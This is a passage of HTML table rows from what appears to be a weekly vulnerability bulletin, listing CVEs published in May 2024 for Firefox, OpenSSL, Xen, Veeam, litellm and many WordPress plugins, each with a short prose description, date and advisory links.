<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4776" target="_blank">CVE-2024-4776</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1887343" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>Memory safety bugs present in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 126, Firefox ESR &lt; 115.11, and Thunderbird &lt; 115.11.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4777" target="_blank">CVE-2024-4777</a><br><a href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=1878199%2C1893340" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-22/" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-23/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Firefox<br> </td>
<td>Memory safety bugs present in Firefox 125. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 126.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4778" target="_blank">CVE-2024-4778</a><br><a href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=1838834%2C1889291%2C1889595%2C1890204%2C1891545" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-21/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>Mozilla--Focus for iOS<br> </td>
<td>The file scheme of URLs would be hidden, resulting in potential spoofing of a website's address in the location bar This vulnerability affects Focus for iOS &lt; 126.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5022" target="_blank">CVE-2024-5022</a><br><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1874560" target="_blank">security@mozilla.org</a><br><a href="https://www.mozilla.org/security/advisories/mfsa2024-24/" target="_blank">security@mozilla.org</a></td>
</tr>
<tr>
<td>NEC Platforms, Ltd--ITK-6DGS-1(BK) TEL<br> </td>
<td>NEC Platforms DT900 and DT900S Series 5.0.0.0 - v5.3.4.4, v5.4.0.0 - v5.6.0.20 allows an attacker to access a non-documented the system settings to change settings via local network with unauthenticated user.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3016" target="_blank">CVE-2024-3016</a><br><a href="https://jpn.nec.com/security-info/secinfo/nv24-002_en.html" target="_blank">psirt-info@cyber.jp.nec.com</a></td>
</tr>
<tr>
<td>Netflix--ConsoleMe<br> </td>
<td>Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Netflix ConsoleMe allows Command Injection.This issue affects ConsoleMe: before 1.4.0.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5023" target="_blank">CVE-2024-5023</a><br><a href="https://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2024-002.md" target="_blank">security-report@netflix.com</a></td>
</tr>
<tr>
<td>OpenSSL--OpenSSL<br> </td>
<td>Issue summary: Checking excessively long DSA keys or parameters may be very slow. Impact summary: Applications that use the functions EVP_PKEY_param_check() or EVP_PKEY_public_check() to check a DSA public key or DSA parameters may experience long delays. Where the key or parameters that are being checked have been obtained from an untrusted source this may lead to a Denial of Service. The functions EVP_PKEY_param_check() or EVP_PKEY_public_check() perform various checks on DSA parameters. Some of those computations take a long time if the modulus (`p` parameter) is too large. Trying to use a very large modulus is slow and OpenSSL will not allow using public keys with a modulus which is over 10,000 bits in length for signature verification. However the key and parameter check functions do not limit the modulus size when performing the checks. An application that calls EVP_PKEY_param_check() or EVP_PKEY_public_check() and supplies a key or parameters obtained from an untrusted source could be vulnerable to a Denial of Service attack. These functions are not called by OpenSSL itself on untrusted DSA keys so only applications that directly call these functions may be vulnerable. Also vulnerable are the OpenSSL pkey and pkeyparam command line applications when using the `-check` option. The OpenSSL SSL/TLS implementation is not affected by this issue. The OpenSSL 3.0 and 3.1 FIPS providers are affected by this issue.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4603" target="_blank">CVE-2024-4603</a><br><a href="https://github.com/openssl/openssl/commit/3559e868e58005d15c6013a0c1fd832e51c73397" target="_blank">openssl-security@openssl.org</a><br><a href="https://github.com/openssl/openssl/commit/53ea06486d296b890d565fb971b2764fcd826e7e" target="_blank">openssl-security@openssl.org</a><br><a href="https://github.com/openssl/openssl/commit/9c39b3858091c152f52513c066ff2c5a47969f0d" target="_blank">openssl-security@openssl.org</a><br><a href="https://github.com/openssl/openssl/commit/da343d0605c826ef197aceedc67e8e04f065f740" target="_blank">openssl-security@openssl.org</a><br><a href="https://www.openssl.org/news/secadv/20240516.txt" target="_blank">openssl-security@openssl.org</a></td>
</tr>
<tr>
<td>Puneeth Reddy--Online Shopping System Advanced<br> </td>
<td>Open-source project Online Shopping System Advanced is vulnerable to Reflected Cross-Site Scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. </td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3579" target="_blank">CVE-2024-3579</a><br><a href="https://cert.pl/en/posts/2024/05/CVE-2024-3579" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/posts/2024/05/CVE-2024-3579" target="_blank">cvd@cert.pl</a></td>
</tr>
<tr>
<td>Rockwell Automation--FactoryTalk Remote Access<br> </td>
<td>An unquoted executable path exists in the Rockwell Automation FactoryTalkÂ® Remote Accessâ„¢ possibly resulting in remote code execution if exploited. While running the FTRA installer package, the executable path is not properly quoted, which could allow a threat actor to enter a malicious executable and run it as a System user. A threat actor needs admin privileges to exploit this vulnerability.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3640" target="_blank">CVE-2024-3640</a><br><a href="https://www.rockwellautomation.com/en-us/support/advisory.SD1671.html" target="_blank">PSIRT@rockwellautomation.com</a></td>
</tr>
<tr>
<td>Rockwell Automation--FactoryTalk View SE<br> </td>
<td>A vulnerability exists in the Rockwell Automation FactoryTalkÂ® View SE Datalog function that could allow a threat actor to inject a malicious SQL statement if the SQL database has no authentication in place or if legitimate credentials were stolen. If exploited, the attack could result in information exposure, revealing sensitive information. Additionally, a threat actor could potentially modify and delete the data in a remote database. An attack would only affect the HMI design time, not runtime.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4609" target="_blank">CVE-2024-4609</a><br><a href="https://www.rockwellautomation.com/en-us/support/advisory.SD1670.html" target="_blank">PSIRT@rockwellautomation.com</a></td>
</tr>
<tr>
<td>The Document Foundation--LibreOffice<br> </td>
<td>Unchecked script execution in Graphic on-click binding in affected LibreOffice versions allows an attacker to create a document which without prompt will execute scripts built-into LibreOffice on clicking a graphic. Such scripts were previously deemed trusted but are now deemed untrusted.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3044" target="_blank">CVE-2024-3044</a><br><a href="https://www.libreoffice.org/about-us/security/advisories/CVE-2024-3044" target="_blank">security@documentfoundation.org</a></td>
</tr>
<tr>
<td>Unknown--Add Custom CSS and JS<br> </td>
<td>The Add Custom CSS and JS WordPress plugin through 1.20 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in as author and above add Stored XSS payloads via a CSRF attack</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3903" target="_blank">CVE-2024-3903</a><br><a href="https://wpscan.com/vulnerability/0a0e7bd4-948d-47c9-9219-380bda9f3034/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Base64 Encoder/Decoder<br> </td>
<td>The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3822" target="_blank">CVE-2024-3822</a><br><a href="https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Base64 Encoder/Decoder<br> </td>
<td>The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3823" target="_blank">CVE-2024-3823</a><br><a href="https://wpscan.com/vulnerability/a138215c-4b8c-4182-978f-d21ce25070d3/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Base64 Encoder/Decoder<br> </td>
<td>The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3824" target="_blank">CVE-2024-3824</a><br><a href="https://wpscan.com/vulnerability/749ae334-b1d1-421e-a04c-35464c961a4a/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--HL Twitter<br> </td>
<td>The HL Twitter WordPress plugin through 2014.1.18 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3629" target="_blank">CVE-2024-3629</a><br><a href="https://wpscan.com/vulnerability/c1f6ed2c-0f84-4b13-b39e-5cb91443c2b1/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--HL Twitter<br> </td>
<td>The HL Twitter WordPress plugin through 2014.1.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3630" target="_blank">CVE-2024-3630</a><br><a href="https://wpscan.com/vulnerability/cbab7639-fdb2-4ee5-b5ca-9e30701a63b7/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--HL Twitter<br> </td>
<td>The HL Twitter WordPress plugin through 2014.1.18 does not have CSRF check when unlinking twitter accounts, which could allow attackers to make logged in admins perform such actions via a CSRF attack</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3631" target="_blank">CVE-2024-3631</a><br><a href="https://wpscan.com/vulnerability/c59a8b49-6f3e-452b-ba9b-50b80c522ee9/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--LetterPress <br> </td>
<td>The LetterPress WordPress plugin through 1.2.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks, such as delete arbitrary subscribers</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3590" target="_blank">CVE-2024-3590</a><br><a href="https://wpscan.com/vulnerability/829f4d40-e5b0-4009-b753-85ca2a5b3d25/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Newsletter Popup<br> </td>
<td>The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some parameters, which could allow unauthenticated visitors to perform Cross-Site Scripting attacks against admins</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3641" target="_blank">CVE-2024-3641</a><br><a href="https://wpscan.com/vulnerability/f4047f1e-d5ea-425f-8def-76dd5e6a497e/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Newsletter Popup<br> </td>
<td>The Newsletter Popup WordPress plugin through 1.2 does not have CSRF check when deleting subscriber, which could allow attackers to make logged in admins perform such action via a CSRF attack</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3642" target="_blank">CVE-2024-3642</a><br><a href="https://wpscan.com/vulnerability/dc44d85f-afe8-4824-95b0-11b9abfb04d8/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Newsletter Popup<br> </td>
<td>The Newsletter Popup WordPress plugin through 1.2 does not have CSRF check when deleting list, which could allow attackers to make logged in admins perform such action via a CSRF attack</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3643" target="_blank">CVE-2024-3643</a><br><a href="https://wpscan.com/vulnerability/698277e6-56f9-4688-9a84-c2fa3ea9f7dc/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Newsletter Popup<br> </td>
<td>The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3644" target="_blank">CVE-2024-3644</a><br><a href="https://wpscan.com/vulnerability/10eb712a-d9c3-46c9-be6a-02811396fae8/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--NextGEN Gallery <br> </td>
<td>The NextGEN Gallery WordPress plugin before 3.59.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2744" target="_blank">CVE-2024-2744</a><br><a href="https://wpscan.com/vulnerability/a5579c15-50ba-4618-95e4-04b2033d721f/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Popup4Phone<br> </td>
<td>The Popup4Phone WordPress plugin through 1.3.2 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3231" target="_blank">CVE-2024-3231</a><br><a href="https://wpscan.com/vulnerability/81dbb5c0-ccdd-4af1-b2f2-71cb1b37fe93/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Popup4Phone<br> </td>
<td>The Popup4Phone WordPress plugin through 1.3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as Editor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3580" target="_blank">CVE-2024-3580</a><br><a href="https://wpscan.com/vulnerability/31f401c4-735a-4efb-b81f-ab98c00c526b/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Post Grid Gutenberg Blocks and WordPress Blog Plugin <br> </td>
<td>The Post Grid Gutenberg Blocks and WordPress Blog Plugin WordPress plugin before 4.0.2 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3239" target="_blank">CVE-2024-3239</a><br><a href="https://wpscan.com/vulnerability/dfa1421b-41b0-4b25-95ef-0843103e1f5e/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--SP Project &amp; Document Manager<br> </td>
<td>The SP Project &amp; Document Manager WordPress plugin through 4.71 is missing validation in its upload function, allowing a user to manipulate the `user_id` to make it appear that a file was uploaded by another user</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3748" target="_blank">CVE-2024-3748</a><br><a href="https://wpscan.com/vulnerability/01427cfb-5c51-4524-9b9d-e09a603bc34c/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--SP Project &amp; Document Manager<br> </td>
<td>The SP Project &amp; Document Manager WordPress plugin through 4.71 lacks proper access controllers and allows a logged in user to view and download files belonging to another user</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3749" target="_blank">CVE-2024-3749</a><br><a href="https://wpscan.com/vulnerability/d14bb16e-ce1d-4c31-8791-bc63174897c0/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Save as PDF Plugin by Pdfcrowd<br> </td>
<td>The Save as PDF Plugin by Pdfcrowd WordPress plugin before 3.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-5971" target="_blank">CVE-2023-5971</a><br><a href="https://wpscan.com/vulnerability/03a201d2-535e-4574-afac-791dcf23e6e1/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--Ultimate Blocks <br> </td>
<td>The Ultimate Blocks WordPress plugin before 3.1.7 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3241" target="_blank">CVE-2024-3241</a><br><a href="https://wpscan.com/vulnerability/a645daee-42ea-43f8-9480-ef3be69606e0/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--UnGallery<br> </td>
<td>The UnGallery WordPress plugin through 2.2.4 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3582" target="_blank">CVE-2024-3582</a><br><a href="https://wpscan.com/vulnerability/5a348b5d-13aa-40c3-9d21-0554683f8019/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--VikBooking Hotel Booking Engine &amp; PMS<br> </td>
<td>The VikBooking Hotel Booking Engine &amp; PMS WordPress plugin before 1.6.8 allows direct access to menus, allowing an authenticated user with subscriber privileges or above, to bypass authorization and access settings of the VikBooking Hotel Booking Engine &amp; PMS WordPress plugin before 1.6.8's they shouldn't be allowed to.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2441" target="_blank">CVE-2024-2441</a><br><a href="https://wpscan.com/vulnerability/9647e273-5724-4a02-868d-9b79f4bb2b79/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--VikBooking Hotel Booking Engine &amp; PMS<br> </td>
<td>The VikBooking Hotel Booking Engine &amp; PMS WordPress plugin before 1.6.8's access control mechanism fails to properly restrict access to its settings, permitting any users that can access a menu to manipulate requests and perform unauthorized actions such as editing, renaming or deleting (categories for example) despite initial settings prohibiting such access. This vulnerability resembles broken access control, enabling unauthorized users to modify critical VikBooking Hotel Booking Engine &amp; PMS WordPress plugin before 1.6.8 configurations.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2749" target="_blank">CVE-2024-2749</a><br><a href="https://wpscan.com/vulnerability/c0640d3a-80b3-4cad-a3cf-fb5d86558e91/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--WP Prayer<br> </td>
<td>The WP Prayer WordPress plugin through 2.0.9 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3405" target="_blank">CVE-2024-3405</a><br><a href="https://wpscan.com/vulnerability/6968d43c-16ff-43a9-8451-71aabbe69014/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--WP Prayer<br> </td>
<td>The WP Prayer WordPress plugin through 2.0.9 does not have CSRF check in place when updating its email settings, which could allow attackers to make a logged in admin change them via a CSRF attack</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3406" target="_blank">CVE-2024-3406</a><br><a href="https://wpscan.com/vulnerability/1bfab060-64d2-4c38-8bc8-a8f81c5a6e0d/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--WP Prayer<br> </td>
<td>The WP Prayer WordPress plugin through 2.0.9 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3407" target="_blank">CVE-2024-3407</a><br><a href="https://wpscan.com/vulnerability/262348ab-a335-4acf-8e4d-229fc0b4972f/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--WP Shortcodes Plugin Shortcodes Ultimate<br> </td>
<td>The WP Shortcodes Plugin - Shortcodes Ultimate WordPress plugin before 7.1.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3548" target="_blank">CVE-2024-3548</a><br><a href="https://wpscan.com/vulnerability/9eef8b29-2c62-4daa-ae90-467ff9be18d8/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--month name translation benaceur<br> </td>
<td>The month name translation benaceur WordPress plugin before 2.3.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3634" target="_blank">CVE-2024-3634</a><br><a href="https://wpscan.com/vulnerability/76e000e0-314f-4e39-8871-68bf8cc95b22/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--reCAPTCHA Jetpack<br> </td>
<td>The reCAPTCHA Jetpack WordPress plugin through 0.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3940" target="_blank">CVE-2024-3940</a><br><a href="https://wpscan.com/vulnerability/bb0245e5-8e94-4f11-9003-d6208945056c/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--reCAPTCHA Jetpack<br> </td>
<td>The reCAPTCHA Jetpack WordPress plugin through 0.2.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged-in admin add Stored XSS payloads via a CSRF attack.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3941" target="_blank">CVE-2024-3941</a><br><a href="https://wpscan.com/vulnerability/6e09e922-983c-4406-8053-747d839995d1/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Unknown--socialdriver-framework<br> </td>
<td>The socialdriver-framework WordPress plugin before 2024.0.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2697" target="_blank">CVE-2024-2697</a><br><a href="https://wpscan.com/vulnerability/c430b30d-61db-45f5-8499-91b491503b9c/" target="_blank">contact@wpscan.com</a></td>
</tr>
<tr>
<td>Veeam--Service Provider Console<br> </td>
<td>Due to an unsafe de-serialization method used by the Veeam Service Provider Console(VSPC) server in communication between the management agent and its components, under certain conditions, it is possible to perform Remote Code Execution (RCE) on the VSPC server machine.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29212" target="_blank">CVE-2024-29212</a><br><a href="https://www.veeam.com/kb4575" target="_blank">support@hackerone.com</a></td>
</tr>
<tr>
<td>Xen--Xen<br> </td>
<td>Unlike 32-bit PV guests, HVM guests may switch freely between 64-bit and other modes. This in particular means that they may set registers used to pass 32-bit-mode hypercall arguments to values outside of the range 32-bit code would be able to set them to. When processing of hypercalls takes a considerable amount of time, the hypervisor may choose to invoke a hypercall continuation. Doing so involves putting (perhaps updated) hypercall arguments in respective registers. For guests not running in 64-bit mode this further involves a certain amount of translation of the values. Unfortunately internal sanity checking of these translated values assumes high halves of registers to always be clear when invoking a hypercall. When this is found not to be the case, it triggers a consistency check in the hypervisor and causes a crash.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46842" target="_blank">CVE-2023-46842</a><br><a href="https://xenbits.xenproject.org/xsa/advisory-454.html" target="_blank">security@xen.org</a></td>
</tr>
<tr>
<td>Xen--Xen<br> </td>
<td>Because of a logical error in XSA-407 (Branch Type Confusion), the mitigation is not applied properly when it is intended to be used. XSA-434 (Speculative Return Stack Overflow) uses the same infrastructure, so is equally impacted. For more details, see: https://xenbits.xen.org/xsa/advisory-407.html https://xenbits.xen.org/xsa/advisory-434.html</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31142" target="_blank">CVE-2024-31142</a><br><a href="https://xenbits.xenproject.org/xsa/advisory-455.html" target="_blank">security@xen.org</a></td>
</tr>
<tr>
<td>Xpdf--Xpdf<br> </td>
<td>Out-of-bounds array write in Xpdf 4.05 and earlier, due to missing object type check in AcroForm field reference.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4976" target="_blank">CVE-2024-4976</a><br><a href="https://www.xpdfreader.com/security-bug/CVE-2024-4976.html" target="_blank">xpdf@xpdfreader.com</a></td>
</tr>
<tr>
<td>alpitronic--Hypercharger EV Charger<br> </td>
<td>If misconfigured, alpitronic Hypercharger EV charging devices can expose a web interface protected by authentication. If the default credentials are not changed, an attacker can use public knowledge to access the device as an administrator.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4622" target="_blank">CVE-2024-4622</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-130-02" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>berriai--berriai/litellm<br> </td>
<td>A remote code execution (RCE) vulnerability exists in the berriai/litellm project due to improper control of the generation of code when using the `eval` function unsafely in the `litellm.get_secret()` method. Specifically, when the server utilizes Google KMS, untrusted data is passed to the `eval` function without any sanitization. Attackers can exploit this vulnerability by injecting malicious values into environment variables through the `/config/update` endpoint, which allows for the update of settings in `proxy_server_config.yaml`.</td>
<td>2024-05-18</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4264" target="_blank">CVE-2024-4264</a><br><a href="https://huntr.com/bounties/a3221b0c-6e25-4295-ab0f-042997e8fc61" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>gaizhenbiao--gaizhenbiao/chuanhuchatgpt<br> </td>
<td>A Local File Inclusion (LFI) vulnerability exists in the gaizhenbiao/chuanhuchatgpt application, specifically within the functionality for uploading chat history. The vulnerability arises due to improper input validation when handling file paths during the chat history upload process. An attacker can exploit this vulnerability by intercepting requests and manipulating the 'name' parameter to specify arbitrary file paths. This allows the attacker to read sensitive files on the server, leading to information leakage, including API keys and private information. The issue affects version 20240310 of the application.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4321" target="_blank">CVE-2024-4321</a><br><a href="https://huntr.com/bounties/19a16f8e-3d92-498f-abc9-8686005f067e" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>imartinez--imartinez/privategpt<br> </td>
